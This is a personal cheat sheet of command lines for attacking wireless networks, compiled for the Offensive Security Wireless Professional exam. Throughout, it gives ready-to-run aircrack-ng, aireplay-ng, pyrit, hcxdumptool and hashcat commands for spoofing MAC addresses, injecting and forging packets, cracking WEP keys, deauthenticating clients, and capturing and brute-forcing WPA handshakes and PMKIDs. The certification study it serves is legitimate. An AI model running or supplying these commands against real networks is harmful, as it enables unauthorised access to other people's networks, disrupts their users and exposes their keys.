Last changed: 15.03.2020
Hacking wireless networks
This commandlist served as a cheat sheet for the Offensive Security Wireless Professional exam and shows the usage of the most common attack tools.
preparation
show and stop interfering processes
systemctl stop NetworkManager
airmon-ng check [kill]change MAC address
macchanger -m 00:11:22:33:44:55 wlan0toggle monitor mode
airmon-ng start wlan0
airmon-ng stop wlan0moncard to card injection test
With two wireless interfaces in monitoring mode you can test which explicit attacks are supported.
aireplay-ng -9 -i wlan1mon wlan0monprevent Network Manager from managing devices
If you want to keep your Network Manager running you can blacklist the MAC addresses of the interfaces which shall be ignored.
/etc/NetworkManager/NetworkManager.conf
...
[keyfile]
unmanaged-devices=mac:00:11:22:33:44:55
...traffic capture
capture traffic( 2.4 and 5GHz)
airodump-ng --band abg --manufacturer wlan0monshow manufacturer information
airodump-ng-oui-update
airodump-ng --manufacturer wlan0monattacking wep
The major flaw of the wep encryption lies in the possibility of a statistical attack based on weak initialization vectors. So the standard procedure consists of starting to dump the traffic, enforcing a lot of data packets and cracking the capture file.
collect ivs
airodump-ng -c 1 -w wep_file --ivs wlan0monopen system authentication
aireplay-ng -1 60 -a <AP_MAC> -h <source_MAC> wlan0monshared key authentication
aireplay-ng -1 60 -y <xor_file> -a <AP_MAC> -h <source_MAC> wlan0monarp replay attack
aireplay-ng -3 -b <AP_MAC> -h <source_MAC> wlan0monchopchop attack
aireplay-ng -4 -b <AP_MAC> -h <source_MAC> wlan0monfragmentation attack
aireplay-ng -5 -b <AP_MAC> -h <source_MAC> wlan0moncreate ARP packet
packetforge-ng -0 -a <AP_MAC> -h <source_MAC> -l 255.255.255.255 -k 255.255.255.255 -y <xor_file> -w arp.capinject packet
aireplay-ng -2 -r arp.cap wlan0moncrack the wep key
aircrack-ng wep_file.ivsattacking wpa
WPA encrypted networks are regarded as secure and the only known attack is to brute force the 4-way handshake or the PMKID.
capture handshake
airodump-ng -c 1 -w wpa_file wlan0mondeauthenticate client
aireplay-ng -0 1 -a <AP_MAC> -c <client_MAC> wlan0monstrip unneeded packets
pyrit -r wpa_file.cap -o wpa_file_strip.cap stripwordlist attack
aircrack-ng -w wordlist.txt wpa_file_strip.cap
pyrit -i wordlist.txt -r wpa_file_strip.cap attack_passthroughbrute force attack
john --incremental --stdout | aircrack-ng -w - wpa_file_strip.capprecomputed pmk attack
pyrit -i wordlist.txt import_passwords
pyrit -e <essid> create_essid
pyrit batch
pyrit -r wpa_file_strip.cap attack_dbspeed up with qw
As with managing wireless networks from the command line the script qw can be used to simplify sniffing and capturing of wpa handshakes.
capture handshake
qw s -c 1 -f wpa_file
qw d <bssid>automatic handshake capture
The tool hcxdumptool automatically tries to retrieve wlan handshakes from found networks and clients.
hcxdumptool -i wlan0 -o out.pcapng -c 1,6,11 --enable_status 1To extract all needed data in a format compatible with hashcat you can use
hcxpcapngtool from hcxtools
hcxpcapngtool -o hashes *.pcapng
hashcat -m 22000 hashes some_wordlist.txtIf you want to crack only uniq handshakes you can filter your file with awk.
grep 'WPA\*02\*' hashes | sort -t\* -k 4 | awk -F \* 'BEGIN{last=0}{ if (last != $4) { print; last=$4} }' > filtered_hashes